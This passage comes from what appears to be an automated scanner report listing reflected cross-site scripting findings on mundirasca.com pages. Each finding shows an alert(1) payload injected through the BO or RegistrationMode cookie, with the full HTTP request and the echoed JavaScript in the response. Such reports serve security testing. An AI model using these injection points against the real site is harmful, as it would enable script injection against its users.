The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba74"-alert(1)-"a6f69e5d088 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM1ba74"-alert(1)-"a6f69e5d088; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1ba74"-alert(1)-"a6f69e5d088; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1ba74"-alert(1)-"a6f69e5d088";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.297. http://www.mundirasca.com/ContactUsMail.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ff03"-alert(1)-"7fbdf972a1f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM9ff03"-alert(1)-"7fbdf972a1f; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: BO=FM9ff03"-alert(1)-"7fbdf972a1f; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9ff03"-alert(1)-"7fbdf972a1f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.298. http://www.mundirasca.com/ContactUsMail.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3545f"-alert(1)-"e9086e55cfd was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM3545f"-alert(1)-"e9086e55cfd; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM3545f"-alert(1)-"e9086e55cfd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM3545f"-alert(1)-"e9086e55cfd";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.299. http://www.mundirasca.com/ContactUsTel.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsTel.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec6c7"-alert(1)-"b781054fc69 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMec6c7"-alert(1)-"b781054fc69; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: BO=FMec6c7"-alert(1)-"b781054fc69; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMec6c7"-alert(1)-"b781054fc69";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.300. http://www.mundirasca.com/ContactUsTel.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsTel.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1238"-alert(1)-"49f227d376 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMc1238"-alert(1)-"49f227d376; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc1238"-alert(1)-"49f227d376; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc1238"-alert(1)-"49f227d376";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.301. http://www.mundirasca.com/FAQ.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FAQ.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d21b0"-alert(1)-"73f2d8373bf was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMd21b0"-alert(1)-"73f2d8373bf; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: BO=FMd21b0"-alert(1)-"73f2d8373bf; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd21b0"-alert(1)-"73f2d8373bf";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.302. http://www.mundirasca.com/FAQ.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FAQ.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40ba4"-alert(1)-"74dcacff84f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM40ba4"-alert(1)-"74dcacff84f; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM40ba4"-alert(1)-"74dcacff84f; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM40ba4"-alert(1)-"74dcacff84f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.303. http://www.mundirasca.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114da"-alert(1)-"07a902d5b1e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM114da"-alert(1)-"07a902d5b1e; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: BO=FM114da"-alert(1)-"07a902d5b1e; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM114da"-alert(1)-"07a902d5b1e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.304. http://www.mundirasca.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bb77"-alert(1)-"ff4a7dede90 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM2bb77"-alert(1)-"ff4a7dede90; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2bb77"-alert(1)-"ff4a7dede90; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2bb77"-alert(1)-"ff4a7dede90";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.305. http://www.mundirasca.com/Help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85403"-alert(1)-"5b3fdfbd71 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM85403"-alert(1)-"5b3fdfbd71; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: BO=FM85403"-alert(1)-"5b3fdfbd71; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM85403"-alert(1)-"5b3fdfbd71";
